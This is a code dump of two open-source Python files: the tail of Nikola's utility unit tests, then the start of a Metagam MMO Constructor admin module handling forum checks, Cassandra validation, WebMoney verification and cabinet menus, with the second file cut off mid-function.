self.assertEqual('2012/09/15 19:52:05', meta['date'])
self.assertFalse('tags' in meta)
self.assertFalse('link' in meta)
self.assertFalse('description' in meta)
self.assertTrue(nsm)
def test_extracting_metadata_from_filename(self):
post = dummy()
post.source_path = '2013-01-23-the_slug-dubdubtitle.md'
post.metadata_path = '2013-01-23-the_slug-dubdubtitle.meta'
with mock.patch('nikola.post.io.open', create=True):
meta, _ = get_meta(
post,
'(?P<date>\d{4}-\d{2}-\d{2})-(?P<slug>.*)-(?P<title>.*)\.md')
self.assertEqual('dubdubtitle', meta['title'])
self.assertEqual('the_slug', meta['slug'])
self.assertEqual('2013-01-23', meta['date'])
def test_get_meta_slug_only_from_filename(self):
post = dummy()
post.source_path = 'some/path/the_slug.md'
post.metadata_path = 'some/path/the_slug.meta'
with mock.patch('nikola.post.io.open', create=True):
meta, _ = get_meta(post)
self.assertEqual('the_slug', meta['slug'])
class HeaderDemotionTest(unittest.TestCase):
def demote_by_zero(self):
input_str = '''\
<h1>header 1</h1>
<h2>header 2</h2>
<h3>header 3</h3>
<h4>header 4</h4>
<h5>header 5</h5>
<h6>header 6</h6>
'''
expected_output = '''\
<h1>header 1</h1>
<h2>header 2</h2>
<h3>header 3</h3>
<h4>header 4</h4>
<h5>header 5</h5>
<h6>header 6</h6>
'''
doc = lxml.html.fromstring(input_str)
outdoc = lxml.html.fromstring(expected_output)
demote_headers(doc, 0)
self.assertEquals(lxml.html.tostring(outdoc), lxml.html.tostring(doc))
def demote_by_one(self):
input_str = '''\
<h1>header 1</h1>
<h2>header 2</h2>
<h3>header 3</h3>
<h4>header 4</h4>
<h5>header 5</h5>
<h6>header 6</h6>
'''
expected_output = '''\
<h2>header 1</h2>
<h3>header 2</h3>
<h4>header 3</h4>
<h5>header 4</h5>
<h6>header 5</h6>
<h6>header 6</h6>
'''
doc = lxml.html.fromstring(input_str)
outdoc = lxml.html.fromstring(expected_output)
demote_headers(doc, 1)
self.assertEquals(lxml.html.tostring(outdoc), lxml.html.tostring(doc))
def demote_by_two(self):
input_str = '''\
<h1>header 1</h1>
<h2>header 2</h2>
<h3>header 3</h3>
<h4>header 4</h4>
<h5>header 5</h5>
<h6>header 6</h6>
'''
expected_output = '''\
<h3>header 1</h3>
<h4>header 2</h4>
<h5>header 3</h5>
<h6>header 4</h6>
<h6>header 5</h6>
<h6>header 6</h6>
'''
doc = lxml.html.fromstring(input_str)
outdoc = lxml.html.fromstring(expected_output)
demote_headers(doc, 2)
self.assertEquals(lxml.html.tostring(outdoc), lxml.html.tostring(doc))
def demote_by_minus_one(self):
input_str = '''\
<h1>header 1</h1>
<h2>header 2</h2>
<h3>header 3</h3>
<h4>header 4</h4>
<h5>header 5</h5>
<h6>header 6</h6>
'''
expected_output = '''\
<h1>header 1</h1>
<h1>header 2</h1>
<h2>header 3</h2>
<h3>header 4</h3>
<h4>header 5</h4>
<h5>header 6</h5>
'''
doc = lxml.html.fromstring(input_str)
outdoc = lxml.html.fromstring(expected_output)
demote_headers(doc, -1)
self.assertEquals(lxml.html.tostring(outdoc), lxml.html.tostring(doc))
class TranslatableSettingsTest(unittest.TestCase):
"""Tests for translatable settings."""
def test_string_input(self):
"""Tests for string input."""
inp = 'Fancy Blog'
S = TranslatableSetting('S', inp, {'xx': ''})
S.default_lang = 'xx'
S.lang = 'xx'
try:
u = unicode(S)
except NameError: # Python 3
u = str(S)
cn = S() # no language specified
cr = S('xx') # real language specified
cf = S('zz') # fake language specified
self.assertEqual(inp, u)
self.assertEqual(inp, cn)
self.assertEqual(inp, cr)
self.assertEqual(inp, cf)
self.assertEqual(S.lang, 'xx')
self.assertEqual(S.default_lang, 'xx')
def test_dict_input(self):
"""Tests for dict input."""
inp = {'xx': 'Fancy Blog',
'zz': 'Schmancy Blog'}
S = TranslatableSetting('S', inp, {'xx': '', 'zz': ''})
S.default_lang = 'xx'
S.lang = 'xx'
try:
u = unicode(S)
except NameError: # Python 3
u = str(S)
cn = S()
cx = S('xx')
cz = S('zz')
cf = S('ff')
self.assertEqual(inp['xx'], u)
self.assertEqual(inp['xx'], cn)
self.assertEqual(inp['xx'], cx)
self.assertEqual(inp['zz'], cz)
self.assertEqual(inp['xx'], cf)
def test_dict_input_lang(self):
"""Test dict input, with a language change along the way."""
inp = {'xx': 'Fancy Blog',
'zz': 'Schmancy Blog'}
S = TranslatableSetting('S', inp, {'xx': '', 'zz': ''})
S.default_lang = 'xx'
S.lang = 'xx'
try:
u = unicode(S)
except NameError: # Python 3
u = str(S)
cn = S()
self.assertEqual(inp['xx'], u)
self.assertEqual(inp['xx'], cn)
# Change the language.
# WARNING: DO NOT set lang locally in real code! Set it globally
# instead! (TranslatableSetting.lang = ...)
# WARNING: TranslatableSetting.lang is used to override the current
# locale settings returned by LocaleBorg! Use with care!
S.lang = 'zz'
try:
u = unicode(S)
except NameError: # Python 3
u = str(S)
cn = S()
self.assertEqual(inp['zz'], u)
self.assertEqual(inp['zz'], cn)
def test_get_metadata_from_file():
# These were doctests and not running :-P
from nikola.post import _get_metadata_from_file
g = _get_metadata_from_file
assert list(g([]).values()) == []
assert str(g([".. title: FooBar"])["title"]) == 'FooBar'
assert 'title' not in g(["", "", ".. title: FooBar"])
assert 'title' in g(["", ".. title: FooBar"])
def test_get_asset_path():
assert get_asset_path('assets/css/nikola_rst.css',
get_theme_chain('bootstrap3', ['themes'])).replace(
'\\', '/').endswith('nikola/data/themes/base/assets/css/nikola_rst.css')
assert get_asset_path('assets/css/theme.css',
get_theme_chain('bootstrap3', ['themes'])).replace(
'\\', '/').endswith(
'nikola/data/themes/bootstrap3/assets/css/theme.css')
assert get_asset_path(
'nikola.py', get_theme_chain('bootstrap3', ['themes']),
{'nikola': ''}).replace(
'\\', '/').endswith('nikola/nikola.py')
assert get_asset_path('nikola.py', get_theme_chain(
'bootstrap3', ['themes']), {'nikola': 'nikola'}) is None
assert get_asset_path(
'nikola/nikola.py', get_theme_chain('bootstrap3', ['themes']),
{'nikola': 'nikola'}).replace(
'\\', '/').endswith('nikola/nikola.py')
def test_get_crumbs():
crumbs = get_crumbs('galleries')
assert len(crumbs) == 1
assert crumbs[0] == ['#', 'galleries']
crumbs = get_crumbs(os.path.join('galleries', 'demo'))
assert len(crumbs) == 2
assert crumbs[0] == ['..', 'galleries']
assert crumbs[1] == ['#', 'demo']
crumbs = get_crumbs(os.path.join('listings', 'foo', 'bar'), is_file=True)
assert len(crumbs) == 3
assert crumbs[0] == ['..', 'listings']
assert crumbs[1] == ['.', 'foo']
assert crumbs[2] == ['#', 'bar']
def test_get_translation_candidate():
config = {'TRANSLATIONS_PATTERN': '{path}.{lang}.{ext}',
'DEFAULT_LANG': 'en', 'TRANSLATIONS': {'es': '1', 'en': 1}}
assert get_translation_candidate(config, '*.rst', 'es') == '*.es.rst'
assert get_translation_candidate(
config, 'fancy.post.rst', 'es') == 'fancy.post.es.rst'
assert get_translation_candidate(config, '*.es.rst', 'es') == '*.es.rst'
assert get_translation_candidate(config, '*.es.rst', 'en') == '*.rst'
assert get_translation_candidate(
config, 'cache/posts/fancy.post.es.html', 'en') == 'cache/posts/fancy.post.html'
assert get_translation_candidate(
config, 'cache/posts/fancy.post.html', 'es') == 'cache/posts/fancy.post.es.html'
assert get_translation_candidate(
config, 'cache/pages/charts.html', 'es') == 'cache/pages/charts.es.html'
assert get_translation_candidate(
config, 'cache/pages/charts.html', 'en') == 'cache/pages/charts.html'
config = {'TRANSLATIONS_PATTERN': '{path}.{ext}.{lang}',
'DEFAULT_LANG': 'en', 'TRANSLATIONS': {'es': '1', 'en': 1}}
assert get_translation_candidate(config, '*.rst', 'es') == '*.rst.es'
assert get_translation_candidate(config, '*.rst.es', 'es') == '*.rst.es'
assert get_translation_candidate(config, '*.rst.es', 'en') == '*.rst'
assert get_translation_candidate(
config, 'cache/posts/fancy.post.html.es', 'en') == 'cache/posts/fancy.post.html'
assert get_translation_candidate(
config, 'cache/posts/fancy.post.html', 'es') == 'cache/posts/fancy.post.html.es'
def test_TemplateHookRegistry():
r = TemplateHookRegistry('foo', None)
r.append('Hello!')
r.append(lambda x: 'Hello ' + x + '!', False, 'world')
assert r() == 'Hello!\nHello world!'
def test_sitemap_get_base_path():
assert sitemap_get_base_path('http://some.site') == '/'
assert sitemap_get_base_path('http://some.site/') == '/'
assert sitemap_get_base_path(
'http://some.site/some/sub-path') == '/some/sub-path/'
assert sitemap_get_base_path(
'http://some.site/some/sub-path/') == '/some/sub-path/'
if __name__ == '__main__':
unittest.main()
|
gwax/nikola
|
tests/test_utils.py
|
Python
|
mit
| 13,389
|
#!/usr/bin/python2.6
# This file is a part of Metagam project.
#
# Metagam is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# any later version.
#
# Metagam is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Metagam. If not, see <http://www.gnu.org/licenses/>.
from mg import *
from mg.core.auth import UserPermissions, UserPermissionsList
from mg.core.queue import Schedule
from mg.core.cluster import DBTempFileList
from mg.constructor.players import DBPlayer, DBCharacter, DBCharacterForm, DBCharacterList
from mg.core.config import DBConfigGroupList
import mg.constructor.common
from mg.core.projects import Project, ProjectList
from uuid import uuid4
import mg
import time
import datetime
import re
re_wmauth_remove = re.compile(r'^([0-9a-f]+)/([0-9a-f]+)$')
re_code = re.compile(r'\[code\].*?\[\/code\]', re.DOTALL)
re_script_line = re.compile(r'^( )+[a-z]+')
re_script_curly = re.compile(r'^( )*}')
re_cassmaint_uri = re.compile(r'^([a-z0-9]{1,32})(?:|/(.+))$')
class DBUserWMID(CassandraObject):
clsname = "UserWMID"
indexes = {
"all": [[], "added"],
"user": [["user"]],
"wmid": [["wmid"]],
}
class DBUserWMIDList(CassandraObjectList):
objcls = DBUserWMID
class ConstructorUtils(Module):
def register(self):
self.rhook("menu-admin-top.list", self.menu_admin_top_list, priority=-500)
def menu_admin_top_list(self, topmenu):
topmenu.append({"href": "//www.%s/forum" % self.main_host, "text": self._("Forum"), "tooltip": self._("Go to the Constructor forum")})
topmenu.append({"href": "//www.%s/cabinet" % self.main_host, "text": self._("Cabinet"), "tooltip": self._("Cabinet")})
class Constructor(Module):
def register(self):
self.rdep(["mg.core.web.Web"])
self.rdep([
"mg.core.l10n.L10n",
"mg.socio.Socio", "mg.socio.SocioAdmin", "mg.socio.Forum", "mg.admin.AdminInterface", "mg.socio.ForumAdmin",
"mg.socio.rules.ForumRules", "mg.socio.rules.ForumRulesAdmin",
"mg.core.auth.Sessions", "mg.core.auth.Interface", "mg.core.cluster.Cluster", "mg.core.hetzner.HetznerAdmin",
"mg.core.emails.Email", "mg.core.queue.Queue", "mg.core.cass_maintenance.CassandraMaintenance", "mg.admin.wizards.Wizards",
"mg.core.projects.Projects",
"mg.constructor.script.ScriptEngine",
"mg.constructor.admin.ConstructorUtils", "mg.core.money.Money", "mg.core.money.MoneyAdmin", "mg.constructor.dashboard.ProjectDashboard",
"mg.constructor.domains.Domains", "mg.constructor.domains.DomainsAdmin",
"mg.core.money.Xsolla", "mg.core.money.XsollaAdmin",
"mg.constructor.design.SocioInterface",
"mg.constructor.interface.Dynamic",
"mg.constructor.doc.Documentation", "mg.core.sites.Counters", "mg.core.sites.CountersAdmin", "mg.core.sites.SiteAdmin",
"mg.core.realplexor.Realplexor", "mg.core.realplexor.RealplexorAdmin", "mg.core.emails.EmailAdmin",
"mg.socio.telegrams.Telegrams",
"mg.core.cluster.ClusterAdmin", "mg.constructor.auth.AuthAdmin", "mg.core.auth.Dossiers",
"mg.socio.smiles.Smiles", "mg.socio.smiles.SmilesAdmin",
"mg.core.emails.EmailSender", "mg.constructor.emails.EmailSenderAdmin",
"mg.socio.restraints.Restraints", "mg.socio.restraints.RestraintsAdmin",
"mg.core.modifiers.Modifiers",
"mg.constructor.paidservices.PaidServices", "mg.constructor.paidservices.PaidServicesAdmin",
"mg.socio.paidservices.PaidServices",
"mg.core.dbexport.Export",
"mg.core.money.WebMoney", "mg.core.money.WebMoneyAdmin",
"mg.constructor.reqauction.ReqAuction", "mg.constructor.reqauction.ReqAuctionAdmin",
"mg.core.sites.Favicon", "mg.core.sites.FaviconAdmin",
"mg.core.permissions_editor.Permissions", "mg.core.permissions_editor.PermissionsAdmin",
"mg.constructor.marketing.MarketingAdmin",
"mg.constructor.marketing.GoogleAnalytics", "mg.constructor.marketing.GoogleAnalyticsAdmin",
"mg.constructor.socialnets.SocialNets", "mg.constructor.socialnets.SocialNetsAdmin",
"mg.core.monitoring.ClusterMonitor",
"mg.core.ssl.RedirectSSLModule", "mg.constructor.money.AdminDonate",
"mg.core.money.XsollaActivation",
"mg.core.tasks.TasksAdmin",
"mg.constructor.custommodules.CustomModulesModule",
])
self.rhook("web.setup_design", self.web_setup_design)
self.rhook("ext-index.index", self.index, priv="public")
self.rhook("ext-cabinet.index", self.cabinet_index, priv="logged")
self.rhook("auth.redirects", self.redirects)
self.rhook("ext-cabinet.settings", self.cabinet_settings, priv="logged")
self.rhook("ext-constructor.newgame", self.constructor_newgame, priv="logged")
self.rhook("objclasses.list", self.objclasses_list)
self.rhook("queue-gen.schedule", self.schedule)
self.rhook("projects.cleanup_inactive", self.cleanup_inactive)
self.rhook("projects.appcheck", self.appcheck)
self.rhook("project.title", self.project_title)
self.rhook("forum-admin.init-categories", self.forum_init_categories)
self.rhook("projects.list", self.projects_list)
self.rhook("projects.owned_by", self.projects_owned_by)
self.rhook("project.cleanup", self.cleanup)
self.rhook("project.missing", self.missing)
self.rhook("web.universal_variables", self.universal_variables)
self.rhook("auth.register-form", self.register_form)
self.rhook("auth.password-changed", self.password_changed)
self.rhook("ext-test.delay", self.test_delay, priv="disabled")
self.rhook("indexpage.render", self.indexpage_render)
self.rhook("telegrams.params", self.telegrams_params)
self.rhook("email.sender", self.email_sender)
self.rhook("ext-constructor.game", self.constructor_game, priv="logged")
self.rhook("currencies.list", self.currencies_list, priority=100)
self.rhook("xsolla.payment-args", self.payment_args)
self.rhook("wmlogin.authorized", self.wmlogin_authorized)
self.rhook("wmid.check", self.wmid_check)
self.rhook("auth.user-auth-table", self.auth_user_table)
self.rhook("permissions.list", self.permissions_list)
self.rhook("ext-admin-wmauth.remove", self.wmauth_remove, priv="auth.wmid")
self.rhook("security.list-roles", self.list_roles)
self.rhook("security.users-roles", self.users_roles)
self.rhook("ext-favicon.ico.index", self.favicon, priv="public")
self.rhook("forum.reply-form", self.forum_reply_form)
self.rhook("forum.topic-form", self.forum_topic_form)
self.rhook("constructor.project-options-main", self.project_options)
self.rhook("ext-admin-cassmaint.validate", self.admin_validate, priv="cassmaint.validate")
self.rhook("headmenu-admin-cassmaint.validate", self.headmenu_validate)
self.rhook("project.logo", self.project_logo)
self.rhook("project.description", self.project_description)
def project_logo(self):
return "%s://www.%s/st/constructor/logo/rounded.jpg" % (self.main_app().protocol, self.main_host)
def project_description(self):
return self._("MMO Constructor is a service allowing users to create their own online games")
def project_options(self, project, options):
if self.req().has_access("cassmaint.validate"):
if project:
options.append({"title": self._("Cassandra DB validation"), "value": '<hook:admin.link href="cassmaint/validate/%s" title="%s" />' % (project.uuid, self._("open"))})
else:
options.append({"title": self._("Cassandra DB validation"), "value": '<hook:admin.link href="cassmaint/validate/%s" title="%s" />' % (self.app().tag, self._("open"))})
def forum_topic_form(self, topic, form, mode):
if mode == "validate":
self.forum_reply_form(form, "validate")
elif mode == "form":
self.forum_reply_form(form, "render")
def headmenu_validate(self, args):
m = re_cassmaint_uri.match(args)
if m:
app_tag, cmd = m.group(1, 2)
if cmd is None:
return ["Cassandra", "constructor/project-dashboard/%s" % app_tag]
else:
return [htmlescape(cmd), "cassmaint/validate/%s" % app_tag]
def admin_validate(self):
req = self.req()
m = re_cassmaint_uri.match(req.args)
if not m:
self.call("web.not_found")
app_tag, cmd = m.group(1, 2)
app = self.app().inst.appfactory.get_by_tag(app_tag)
if not app:
self.call("web.not_found")
objclasses = {}
app.hooks.call("objclasses.list", objclasses)
if cmd is not None:
if cmd not in objclasses:
self.call("admin.redirect", "cassmaint/validate/%s" % app_tag)
cnt = self.call("cassmaint.validate", app, cls=cmd)
if cnt is None:
self.call("admin.response", self._("Validation failed"), {})
else:
config = app.config_updater()
config.set("cassmaint.%s" % cmd, {"cnt": cnt["obj"], "performed": self.now()})
config.store()
self.call("admin.response", self._("Validated objects: {obj}, indexes: {index}<br />Missing index keys restored: {missing}<br />Orphaned index keys deleted: {orphaned}").format(**cnt), {})
rows = []
for cls in sorted(objclasses.keys()):
perf = app.config.get("cassmaint.%s" % cls)
if perf:
perf = self._("{cnt} objects at {performed}").format(cnt=perf["cnt"], performed=self.call("l10n.time_local", perf["performed"]))
rows.append([
cls,
perf,
u'<hook:admin.link href="cassmaint/validate/%s/%s" title="%s" />' % (app_tag, cls, self._("validate")),
])
vars = {
"tables": [
{
"header": [
self._("Table name"),
self._("Last validation"),
self._("Validation"),
],
"rows": rows
}
]
}
self.call("admin.response_template", "admin/common/tables.html", vars)
def forum_reply_form(self, form, mode):
req = self.req()
if not req.param("save") and not req.param("publish"):
return
content = req.param("content")
if re_code.search(content):
return
script_lines = 0
curly_lines = 0
has_script = False
for line in content.split("\n"):
if re_script_line.match(line):
script_lines += 1
if re_script_curly.match(line):
curly_lines += 1
if script_lines >= 1 and curly_lines >= 1:
has_script = True
break
if not has_script:
return
if mode == "validate":
if not req.param("ignore_code"):
form.error("ignore_code", self._("It seems that your post contains script code without [code]...[/code] tags. Please select your script and press the 'CODE' button. It will make you code looking better. If you think this message is erroneous set the checkbox"), overwrite=False)
elif mode == "render":
form.checkbox(self._("Post as is, without [code][/code] tags"), "ignore_code", req.param("ignore_code"))
def favicon(self):
f = open("%s/data/logo/favicon.ico" % mg.__path__[0], "rb")
data = f.read()
f.close()
self.call("web.response", data, "image/x-icon")
def permissions_list(self, perms):
perms.append({"id": "auth.wmid", "name": self._("Managing authorized WMIDs")})
perms.append({"id": "cassmaint.validate", "name": self._("Validating and repairing cassandra database")})
def payment_args(self, args, options):
try:
req = self.req()
except AttributeError:
req = None
if req and req.user():
user = self.obj(User, req.user())
args["v1"] = user.get("name")
args["email"] = user.get("email")
def currencies_list(self, currencies):
currencies["MM$"] = {
"real": True,
"code": "MM$",
"description": self._("This currency is sold for real money"),
"format": "%.2f",
"image": "/st-mg/constructor/money/mmdollar-image.png",
"icon": "/st-mg/constructor/money/mmdollar-icon.png",
"real_price": 30.0,
"real_currency": "RUB",
"real_roubles": 30.0,
"precision": 2,
"name_plural": self._("MMO Constructor Dollars"),
"name_local": self._("MMO Constructor Dollar/MMO Constructor Dollars"),
"name_en": "MMO Constructor Dollar/MMO Constructor Dollars",
}
raise Hooks.Return()
def test_delay(self):
Tasklet.sleep(20)
self.call("web.response", "ok\n")
def register_form(self, form, mode):
req = self.req()
age18 = req.param("age18")
if mode == "validate":
if not age18:
form.error("age18", self._("You must confirm you are of the full legal age"))
elif mode == "render":
form.checkbox(self._("I confirm I'm of the full legal age"), "age18", age18)
def missing(self, tag):
app = self.app().inst.appfactory.get_by_tag(tag)
return app is None
def forum_init_categories(self, cats):
cats.append({"id": uuid4().hex, "topcat": self._("Constructor"), "title": self._("News"), "description": self._("News related to the Constructor"), "order": 10.0, "default_subscribe": True})
cats.append({"id": uuid4().hex, "topcat": self._("Constructor"), "title": self._("Support"), "description": self._("Constructor technical support"), "order": 20.0})
cats.append({"id": uuid4().hex, "topcat": self._("Game Development"), "title": self._("Developers club"), "description": self._("Any talks related to the game development"), "order": 30.0})
def project_title(self):
return "MMO Constructor"
def appfactory(self):
raise Hooks.Return(mg.constructor.common.ApplicationFactory(self.app().inst))
def webservice(self):
raise Hooks.Return(mg.constructor.common.ConstructorWebService(self.app().inst))
def objclasses_list(self, objclasses):
objclasses["Project"] = (Project, ProjectList)
def projects_list(self, projects):
projects.append({"uuid": "main"})
list = self.app().inst.int_app.objlist(ProjectList, query_index="created")
list.load(silent=True)
projects.extend(list.data())
def projects_owned_by(self, owner, projects):
list = self.app().inst.int_app.objlist(ProjectList, query_index="owner", query_equal=owner)
list.load(silent=True)
projects.extend(list.data())
def schedule(self, sched):
sched.add("projects.cleanup_inactive", "10 1 * * *", priority=10)
sched.add("projects.appcheck", "0 0 * * *", priority=10)
def cleanup_inactive(self):
inst = self.app().inst
projects = inst.int_app.objlist(ProjectList, query_index="inactive", query_equal="1", query_finish=self.now(-30 * 86400))
for project in projects:
self.info("Removing inactive project %s", project.uuid)
self.call("project.cleanup", project.uuid)
def appcheck(self):
self.info("Starting daily check")
apps = []
self.call("applications.list", apps)
for app in apps:
self.call("queue.add", "app.check", priority=0, app_tag=app["tag"], unique="app-check-%s" % app["cls"], app_cls=app["cls"])
def web_setup_design(self, vars):
req = self.req()
topmenu = []
cabmenu = []
if req.group == "index" and req.hook == "index":
vars["disclaimer"] = self._("Intended audience: Mature (16+)")
vars["global_html"] = "constructor/index_global.html"
elif req.group == "constructor" and req.hook == "newgame" or req.group == "webmoney":
vars["global_html"] = "constructor/cabinet_global.html"
cabmenu.append({"title": self._("Return to the Cabinet"), "href": "/cabinet", "image": "/st/constructor/cabinet/constructor.gif"})
elif req.group == "socio" and req.hook == "image":
pass
elif req.group == "auth" or req.group == "email":
if req.hook == "change" or req.hook == "email":
vars["global_html"] = "constructor/cabinet_global.html"
vars["ToTheMainPage"] = self._("To the main page")
if req.hook == "change":
cabmenu.append({"title": self._("Password changing"), "left": True})
elif req.hook == "email":
cabmenu.append({"title": self._("E-mail changing"), "left": True})
cabmenu.append({"image": "/st/constructor/cabinet/settings.gif", "title": self._("Return to the Settings"), "href": "/cabinet/settings"})
else:
vars["global_html"] = "constructor/index_global.html"
elif req.group == "reqauction":
vars["title_suffix"] = " - %s" % self._("MMO Constructor Requests auction")
vars["global_html"] = "constructor/socio_global.html"
topmenu.append({"href": "/doc", "html": self._("Documentation")})
topmenu.append({"href": "/forum", "html": self._("Forum")})
if req.user():
topmenu.append({"href": "/cabinet", "html": self._("Cabinet")})
topmenu.append({"html": self._("MMO Constructor Requests auction"), "header": True, "left": True})
elif req.group == "cabinet":
vars["global_html"] = "constructor/cabinet_global.html"
vars["ToTheMainPage"] = self._("To the main page")
if req.hook == "settings":
cabmenu.append({"title": self._("Settings"), "left": True})
cabmenu.append({"title": self._("Return to the Cabinet"), "href": "/cabinet", "image": "/st/constructor/cabinet/constructor.gif"})
elif req.hook == "index":
user = self.obj(User, req.user())
cabmenu.append({"title": self._("Documentation"), "href": "/doc", "left": True})
cabmenu.append({"title": self._("Settings"), "href": "/cabinet/settings", "left": True})
cabmenu.append({"title": self._("Requests auction"), "href": "/reqauction", "left": True})
cabmenu.append({"title": self._("Forum"), "href": "/forum", "left": True})
links = []
self.call("telegrams.menu", links)
for link in links:
cabmenu.append({"image": "/st/constructor/cabinet/telegrams%s.gif" % ("-act" if link["suffix"] else ""), "title": link["html"], "href": link["href"], "left": True, "suffix": link["suffix"]})
cabmenu.append({"image": "/st/constructor/cabinet/logout.gif", "title": self._("Logout %s") % htmlescape(user.get("name")), "href": "/auth/logout"})
elif req.group == "forum" or req.group == "socio":
vars["title_suffix"] = " - %s" % self._("MMO Constructor Forum")
redirect = req.param("redirect")
redirect_param = True
if redirect is None or redirect == "":
redirect = req.uri()
redirect_param = False
redirect = urlencode(redirect)
if req.hook == "settings":
pass
else:
if req.group == "forum":
topmenu.append({"search": True, "button": self._("socio-top///Search")})
if req.user():
topmenu.append({"href": "/forum/settings?redirect=%s" % redirect, "html": self._("Settings")})
links = []
self.call("telegrams.menu", links)
for link in links:
topmenu.append({"image": "/st/constructor/cabinet/telegrams%s.gif" % ("-act" if link["suffix"] else ""), "html": link["html"], "href": link["href"], "suffix": link["suffix"]})
topmenu.append({"href": "/doc", "html": self._("Documentation")})
if req.user():
topmenu.append({"href": "/socio/paid-services", "html": u'<img src="/st-mg/img/coins-16x16.png" alt="{premium}" title="{premium}" />'.format(premium=self._("Premium"))})
if req.group != "forum":
topmenu.append({"href": "/forum", "html": self._("Forum")})
if req.user():
topmenu.append({"href": "/reqauction", "html": self._("Auction")})
topmenu.append({"href": "/cabinet", "html": self._("Cabinet")})
else:
topmenu.append({"href": "/auth/login?redirect=%s" % redirect, "html": self._("Log in")})
topmenu.append({"href": "/auth/register?redirect=%s" % redirect, "html": self._("Register")})
if redirect_param:
topmenu.append({"href": htmlescape(req.param("redirect")), "html": self._("Cancel")})
elif req.group == "telegrams":
vars["title_suffix"] = " - %s" % self._("MMO Constructor")
topmenu.append({"href": "/doc", "html": self._("Documentation")})
topmenu.append({"href": "/forum", "html": self._("Forum")})
links = []
self.call("telegrams.menu", links)
for link in links:
topmenu.append({"image": "/st/constructor/cabinet/telegrams%s.gif" % ("-act" if link["suffix"] else ""), "html": link["html"], "href": link["href"], "suffix": link["suffix"]})
topmenu.append({"href": "/cabinet", "html": self._("Cabinet")})
elif req.group == "doc":
#vars["global_html"] = "constructor/socio_global.html"
if req.user():
topmenu.append({"href": "/reqauction", "html": self._("Request auction")})
topmenu.append({"href": "/forum", "html": self._("Forum")})
if req.user():
topmenu.append({"href": "/cabinet", "html": self._("Cabinet")})
topmenu.append({"html": self._("MMO Constructor Documentation"), "header": True, "left": True})
elif req.group == "admin":
vars["global_html"] = "constructor/admin_global.html"
# Topmenu
if len(topmenu):
topmenu_left = []
topmenu_right = []
for ent in topmenu:
if ent.get("left"):
topmenu_left.append(ent)
else:
topmenu_right.append(ent)
if len(topmenu_left):
topmenu_left[-1]["lst"] = True
vars["topmenu_left"] = topmenu_left
if len(topmenu_right):
topmenu_right[-1]["lst"] = True
vars["topmenu_right"] = topmenu_right
# Cabmenu
if len(cabmenu):
cabmenu_left = []
cabmenu_right = []
first_left = True
first_right = True
for ent in cabmenu:
if ent.get("left"):
cabmenu_left.append(ent)
else:
cabmenu_right.append(ent)
if len(cabmenu_left):
cabmenu_left[-1]["lst"] = True
vars["cabmenu_left"] = cabmenu_left
if len(cabmenu_right):
cabmenu_right[-1]["lst"] = True
vars["cabmenu_right"] = cabmenu_right
def universal_variables(self, vars):
vars["ConstructorTitle"] = self._("Browser-based Games Constructor")
vars["ConstructorCopyright"] = self._("Copyright © Joy Team, 2009-%s") % datetime.datetime.utcnow().strftime("%Y")
vars["ConstructorSupport"] = '<a href="mailto:support@{0}">support@{0}</a>'.format(self.main_host)
def redirects(self, tbl):
tbl["login"] = "/cabinet"
tbl["register"] = "/cabinet"
tbl["change"] = "/cabinet/settings"
def index(self):
req = self.req()
vars = {
"title": self._("Constructor of browser-based online games"),
"login": self._("log in"),
"register": self._("register"),
"forum": self._("forum"),
"cabinet": self._("cabinet"),
"logout": self._("log out"),
"documentation": self._("documentation"),
}
if req.user():
vars["logged"] = True
self.call("socialnets.render", vars, simple=True)
self.call("web.response_template", "constructor/index.html", vars)
def cabinet_index(self):
req = self.req()
menu = []
menu_projects = []
vars = {
"title": self._("Cabinet"),
}
# constructor admin
perms = req.permissions()
if len(perms):
menu_projects.append({"href": "/admin", "image": "/st/constructor/cabinet/untitled.gif", "text": self._("Constructor administration")})
columns = 4
if not self.call("wmid.check", req.user()):
vars["cabinet_wmbtn"] = {
"href": self.call("wmlogin.url"),
"title": self._("Verify your WMID")
}
lang = self.call("l10n.lang")
if lang == "ru":
url = "https://start.webmoney.ru/"
else:
url = "https://start.wmtransfer.com/"
vars["cabinet_comment"] = self._('<p>To get an ability to write to the forum and to use the Request auction follow the steps given below:</p><ul><li><a href="{url}" target="_blank">Register in the WebMoney system</a> please</li><li>Press "Verify your WMID" button</li></ul><p><a href="/doc/wmcertificates"><strong>For what reason we require it</strong></a></p>').format(url=url)
columns = 3
# list of games
projects = self.app().inst.int_app.objlist(ProjectList, query_index="owner", query_equal=req.user())
projects.load(silent=True)
if len(projects):
for project in projects:
if project.get("suspended"):
continue
title = project.get("title_short")
if title is None:
title = self._("Untitled game")
href = None
if project.get("inactive"):
domain = "%s.%s" % (project.uuid, self.conf("constructor.projects-domain", self.main_host))
href = "http://%s/admin" % domain
else:
href = "/constructor/game/%s" % project.uuid
logo = project.get("logo")
if logo is None:
logo = "/st/constructor/cabinet/untitled.gif"
menu_projects.append({"href": href, "image": logo, "text": title})
if len(menu_projects) >= columns:
menu.append(menu_projects)
menu_projects = []
if len(menu_projects):
menu.append(menu_projects)
if menu:
vars["cabinet_menu"] = menu
vars["cabinet_leftbtn"] = {
"href": "/constructor/newgame",
"title": self._("Create a new game")
}
self.call("web.response_global", None, vars)
def cabinet_settings(self):
req = self.req()
vars = {
"title": self._("MMO Constructor Settings"),
"cabinet_menu": [
[
{ "href": "/auth/change", "image": "/st/constructor/cabinet/untitled.gif", "text": self._("Change password") },
{ "href": "/auth/email", "image": "/st/constructor/cabinet/untitled.gif", "text": self._("Change e-mail") },
{ "href": "/forum/settings?redirect=/cabinet/settings", "image": "/st/constructor/cabinet/untitled.gif", "text": self._("Forum settings") },
],
],
}
wmids = self.wmid_check(req.user())
if wmids:
vars["cabinet_center"] = self._('Your verified WMID: {wmid}. <a href="{url}">Check again</a>').format(wmid=', '.join([self._('<strong>{wmid}</strong> (certificate: <strong>{certificate}</strong>)').format(wmid=wmid, certificate=self.cert_name(cert)) for wmid, cert in wmids.iteritems()]), url=self.call("wmlogin.url"))
self.call("web.response_global", None, vars)
def cert_name(self, cert):
if cert >= 130:
return self._("wmcert///personal")
elif cert >= 120:
return self._("wmcert///initial")
elif cert >= 110:
return self._("wmcert///formal")
else:
return self._("wmcert///pseudonymous")
def constructor_newgame(self):
req = self.req()
if not self.call("wmid.check", req.user()) and False:
